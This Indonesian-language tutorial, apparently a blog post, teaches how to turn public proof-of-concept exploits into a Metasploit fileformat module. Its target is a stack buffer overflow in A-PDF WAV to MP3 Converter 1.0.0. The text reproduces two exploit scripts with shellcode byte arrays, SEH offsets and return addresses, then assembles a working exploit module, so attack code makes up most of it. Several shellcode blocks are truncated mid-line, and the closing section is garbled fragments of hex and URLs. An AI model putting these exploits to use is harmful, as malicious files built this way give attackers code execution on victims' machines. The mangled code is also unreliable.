##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
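class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  # FILEFORMAT: this is a client-side module. It writes a malicious file to
  # disk (file_create); the victim must open it in the vulnerable application.
  include Msf::Exploit::FILEFORMAT
  # Seh: supplies generate_seh_record() for SEH-overwrite exploits. Despite
  # living under Msf::Exploit::Remote, it has nothing to do with network access.
  include Msf::Exploit::Remote::Seh

  # Module metadata. Every placeholder (Name, Description, Author, References,
  # Ret, DisclosureDate) must be filled in before the module is usable.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Exploit Title',
      'Description'    => %q{
        Exploit Description
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Author'
        ],
      'Version'        => '$Revision: $',
      'References'     =>
        [
          # The original template left this string unterminated; fixed.
          [ 'URL', 'http://www.somesite.com/' ],
        ],
      'Payload'        =>
        {
          # Maximum size of the encoded payload the overflow can hold.
          'Space'           => 6000,
          # Bytes the target parser must never see in the buffer; at least
          # NUL and newline for most parsers -- confirm against the real target.
          'BadChars'        => "\x00\x0a",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # 'Ret' is the SEH handler address (a pop/pop/ret gadget). The
          # template left it empty, which is a syntax error; 0 is a placeholder
          # that MUST be replaced with a real address from the target binary.
          [ 'Windows Universal', { 'Ret' => 0x00000000 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Date',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'filename.ext']),
      ], self.class)
  end

  # Builds the malicious file and writes it under datastore['FILENAME'].
  # NOTE: `sploit` is not defined in this skeleton; a real module must build
  # the buffer here (padding, SEH record, NOP sled, payload.encoded).
  def exploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end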
Jadi dalam menulis exploit sebenarnya mengacu pada acuan baku seperti diatas :
1. class Metasploit3 < Msf::Exploit::Remote
2. def initialize
3. def exploit
...
perhatikan ketiganya itu....
jadi apabila kita akan menulis exploit harus menggunakan ketiga metode ini,
perhatikan baik baik dan hafalkan.
Nanti saya akan mencontohkan bagaimana cara merubah structur tersebut menjadi sebuah exploit.
saya akan jelaskan satu persatu :
yang pertama coba perhatikan cara penulisan class diatas :
class Metasploit3 < Msf::Exploit::Remote
...
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
Itu adalah bagian baku (boilerplate) dari sebuah modul. Perhatikan: `Msf::Exploit::Remote::Seh` BUKAN berarti exploit ini bersifat "remote". Mixin `Seh` hanya menyediakan fungsi `generate_seh_record()` untuk menyusun record SEH (nSEH + alamat handler) pada exploit berbasis SEH overwrite, sedangkan `Msf::Exploit::FILEFORMAT` menandakan modul ini membuat sebuah file berbahaya (lewat `file_create`) yang harus dibuka korban secara lokal (client-side), bukan menyerang layanan jaringan. Jadi gunakan `include Msf::Exploit::Remote::Seh` hanya jika bug-nya memang SEH overwrite, dan `FILEFORMAT` jika exploit-nya berupa file.
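# Module metadata. Every placeholder here must be replaced before the module
# is usable; the two syntax errors in the original template (unterminated URL
# string, empty 'Ret' value) are fixed below.
def initialize(info = {})
  super(update_info(info,
    'Name'           => 'Exploit Title',
    'Description'    => %q{
      Exploit Description
    },
    'License'        => MSF_LICENSE,
    'Author'         =>
      [
        'Author'
      ],
    'Version'        => '$Revision: $',
    'References'     =>
      [
        [ 'URL', 'http://www.somesite.com/' ],
      ],
    'Payload'        =>
      {
        # Maximum size of the encoded payload the overflow can hold.
        'Space'           => 6000,
        # Bytes the target parser must never see; confirm against the real target.
        'BadChars'        => "\x00\x0a",
        'StackAdjustment' => -3500,
      },
    'Platform'       => 'win',
    'Targets'        =>
      [
        # 'Ret' is the SEH handler address (pop/pop/ret). 0 is only a
        # placeholder so the template parses; replace it with a real address.
        [ 'Windows Universal', { 'Ret' => 0x00000000 } ],
      ],
    'Privileged'     => false,
    'DisclosureDate' => 'Date',
    'DefaultTarget'  => 0))

  register_options(
    [
      OptString.new('FILENAME', [ true, 'The file name.', 'filename.ext']),
    ], self.class)
end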
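# Builds the malicious file and writes it under datastore['FILENAME'] via the
# FILEFORMAT mixin. The original listing truncated the print_status line; it is
# restored to match the template above.
# NOTE: `sploit` is not defined in this skeleton; a real module must build the
# buffer here (padding, SEH record, NOP sled, payload.encoded).
def exploit
  print_status("Creating '#{datastore['FILENAME']}' file ...")
  file_create(sploit)
end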
Kita coba berlatih dengan exploit yang ada di sini:
http://www.exploit-db.com/
Kita coba ubah exploit (PoC) ini menjadi sebuah modul Metasploit Framework.
##########################
#
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com
# Reference: http://www.exploit-db.com/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
##########################
# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
code = (
"\x89\xe1\xd9\xee\xd9\x71\
"\x43\x43\x43\x43\x43\x43\
"\x58\x34\x41\x50\x30\x41\
"\x42\x41\x41\x42\x54\x41\
"\x30\x42\x42\x58\x50\x38\
"\x48\x47\x34\x43\x30\x45\
"\x4c\x4c\x4b\x43\x4c\x45\
"\x4b\x50\x4f\x45\x48\x4c\
"\x4b\x51\x59\x4c\x4b\x50\
"\x51\x49\x50\x4c\x59\x4e\
"\x57\x49\x51\x49\x5a\x44\
"\x34\x47\x4b\x50\x54\x47\
"\x4b\x51\x4f\x47\x54\x45\
"\x4c\x50\x4b\x4c\x4b\x51\
"\x4b\x45\x4c\x4c\x4b\x45\
"\x44\x44\x44\x48\x43\x51\
"\x56\x42\x44\x4c\x4b\x51\
"\x4c\x4c\x4b\x44\x30\x45\
"\x58\x4b\x39\x4a\x58\x4d\
"\x58\x4a\x50\x4d\x5a\x44\
"\x4e\x4c\x4a\x44\x4e\x50\
"\x51\x42\x4c\x42\x43\x43\
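buff = "\x41" * 4132          # filler up to the SEH record (offset 4132)
nops = "\x90" * 12
nseh = "\xEB\x06\x90\x90"     # nSEH: short jmp +6, hops over the handler address
retn = "\x5C\x26\x47\x00"     # SEH handler: 0x0047265C, pop/pop/ret in wavtomp3.exe
junk = "\x42" * 300
sploit = buff + nseh + retn + nops + code + junk

# Python 2 script: str is a byte string here. Write in binary mode so no
# newline translation can alter the buffer, and let `with` close the file
# even if write() fails. Only I/O errors are trapped; the original bare
# `except:` also swallowed KeyboardInterrupt and programming errors.
try:
    # No file checking by the target: any extension works (.xyz .foo .abc)
    with open("Dr_IDEs.wav", "wb") as f1:
        f1.write(sploit)
    print("[*] Success. Load File.")
except IOError:
    print("[-] Error, could not write the file.")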
namanya juga latihan........
jadi kita punya 2 bahan:
1. Struktur modul Metasploit di atas, yang bagian-bagiannya bisa kita ubah sesuai target.
2. Bug yang akan dieksploitasi. Dalam contoh ini bug-nya lokal / file-format (korban harus meng-import dan memutar file .wav/.m3u yang kita buat, lihat baris "Usage" di PoC), bukan bug remote pada layanan jaringan.
Nanti kita coba buat sebuah exploit untuk bug diatas,
sekarang kita buka bug aslinya yang ada di web ini :
http://www.exploit-db.com/
jadi ada 2 bug di aplikasi itu.....
kita mengacu ke bug2 milik http://www.exploit-db.com/
# Exploit Title: A-PDF WAV to MP3 Converter 1.0.0 (.m3u) Stack Buffer Overflow
# Author: d4rk-h4ck3r
# Date: 2010-07-17
# Software Link: http://www.brothersoft.com
# Greetz 2 : PASSEWORD , KAiSER-J , sec4...ever , tli7a , All Tun!Sian h4ck3rz
# Spacial thanks 2 : MadjiX ( el m3alem )
# Tested on: Windows XP SP3 Fr
# Filler up to the saved return address (offset 4128 in the .m3u parser).
my $jnk = "\x41" x 4128;
# Direct EIP overwrite: 0x7C924663 = call esp inside kernel32.dll. This is a
# system-DLL address, so it only matches the tested build (Windows XP SP3 FR).
my $eip = "\x63\x46\x92\x7C";
# Small NOP sled in front of the shellcode.
my $nop = "\x90" x 20;
$shellcode = $shellcode
."\xdb\xc0\x31\xc9\xbf\x7c
"\x1e\x58\x31\x78\x18\x83\
"\x78\xbc\x65\xc9\x78\xb6\
"\x3a\x32\x1c\xbf\x62\xed\
"\x60\xf5\x71\xca\x06\x35\
"\xf0\x27\xdd\x48\xfd\x22\
"\xcf\x4c\x4f\x23\xd3\x53\
"\x1f\x57\x53\x64\x51\xa1\
"\xf5\xaa\xf1\x05\xa8\x26\
"\xb6\x0e\x2f\x85\x19\x87\
"\x7f\xe8\x7b\xca";
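# Write the .m3u file. Use '>' (truncate), not '>>' (append): with append mode
# a second run stacks another copy after the first and the file no longer
# matches the analysed layout. Check the open and write raw bytes.
open(MYFILE, '>', 'd4rk.m3u') or die "[-] Could not write d4rk.m3u: $!\n";
binmode(MYFILE);
print MYFILE $jnk.$eip.$nop.$shellcode;
close(MYFILE);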
Dari Uraian diatas kita sudah punya 2 kunci :
1. Carilah Bugnya dan kita mendapatkan acuan bug di :
...
http://www.exploit-db.com/
http://www.exploit-db.com/
2. Kita sudah punya struktur cara menulis diatas,
Hanya itu dalam menulis exploit,
yuk kita praktekkan................
1. def initialize(info = {})
2. super(update_info(info,
3. 'Name' => 'A-PDF WAV to MP3 v1.0.0 Buffer Overflow',
...4. 'Description' => %q{
Kita dapat mengetikkan keterangan jenis exploit disini
},
5. 'License' => MSF_LICENSE,
6. 'Author' =>
[
'd4rk-h4ck3r', # Nama Penemu Exploit ini pertama
'Dr_IDE', # SEH Exploit (yang menggunakan SEH)
'dookie' # MSF Module
],
7. 'Version' => '$Revision: $',
8. 'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/14676/' ],
[ 'URL', 'http://www.exploit-db.com/exploits/14681/' ],
],
Sampai di sini mudah bukan membuat header exploit... Tinggal memindahkan Name, Description, License, Author, Version, dan References dari advisory/PoC-nya.
Yang benar-benar menentukan berhasil-tidaknya exploit bukan header-nya, melainkan nilai 'Ret' dan 'Offset' pada 'Targets': offset 4132 dan alamat pop/pop/ret 0x0047265c diambil dari PoC SEH milik Dr_IDE (buff 4132 byte, retn "\x5C\x26\x47\x00"). Alamat itu berada di dalam wavtomp3.exe sendiri, bukan di DLL sistem, sehingga target bisa disebut 'Windows Universal' — berbeda dengan PoC d4rk-h4ck3r yang memakai call esp di kernel32 (0x7C924663) dan hanya cocok untuk Windows XP SP3 versi Prancis, seperti yang juga disebut di catatan EDB pada PoC Dr_IDE.
{
...
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true'
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x0047265c, 'Offset' => 4132 } ], # p/p/r in wavtomp3.exe
],
'Privileged' => false,
'DisclosureDate' => 'Aug 17 2010',
'DefaultTarget' => 0))
kemudian kita deklarasikan
[
...
OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
], self.class)
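# Builds the .wav file. Buffer layout mirrors Dr_IDE's PoC:
#   [filler up to target['Offset']] [nSEH + SEH handler] [NOP sled] [payload]
# The listing truncated three lines; they are restored here from the target
# definition ('Offset' => 4132, 'Ret' => pop/pop/ret in wavtomp3.exe).
def exploit
  sploit =  rand_text_alpha_upper(target['Offset'])  # filler instead of a fixed "A" pattern
  sploit << generate_seh_record(target.ret)          # nSEH (short jmp) + handler address
  sploit << make_nops(12)
  sploit << payload.encoded

  print_status("Creating '#{datastore['FILENAME']}' file ...")
  file_create(sploit)
end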
Sebelum melanjutkan belajar menulis exploit sendiri. Kita pelajari struktur2 coding exploit !!!
Tinggal mengganti tulisan2 note berikut ini :
#!/usr/bin/env python ########################## ########################## ### /a-pdf-wav-to-mp3-converte r-394393.html exploits/14676/ ########################## ########################## ### xf4\x58\x50\x59\x49\x49\x4 9\x49" x51\x5a\x56\x54\x58\x33\x3 0\x56" x33\x48\x48\x30\x41\x30\x3 0\x41" x41\x51\x32\x41\x42\x32\x4 2\x42" x41\x43\x4a\x4a\x49\x4b\x4 c\x4a" x50\x45\x50\x4c\x4b\x51\x5 5\x47" x55\x42\x58\x45\x51\x4a\x4 f\x4c" x4b\x51\x4f\x51\x30\x43\x3 1\x4a" x34\x4c\x4b\x43\x31\x4a\x4 e\x46" x4c\x4d\x54\x49\x50\x42\x5 4\x45" x4d\x43\x31\x48\x42\x4a\x4 b\x4c" x54\x45\x54\x43\x45\x4b\x5 5\x4c" x51\x4a\x4b\x45\x36\x4c\x4 b\x44" x4f\x45\x4c\x43\x31\x4a\x4 b\x4c" x51\x4a\x4b\x4c\x49\x51\x4 c\x46" x4f\x50\x31\x4a\x56\x45\x3 0\x50" x56\x50\x30\x4c\x4b\x51\x5 0\x44" x4c\x4e\x4d\x4c\x4b\x43\x5 8\x45" x53\x49\x50\x42\x4a\x50\x5 0\x43" x44\x51\x4f\x45\x38\x4a\x3 8\x4b" x57\x4b\x4f\x4d\x37\x42\x4 3\x43" x30\x41\x41");
Ingat ............... exploits/14676/ exploits/14681/ .
Kita edit struktur acuan kita : exploits/14676/' ], exploits/14681/' ],
'DefaultOptions' =>
register_options(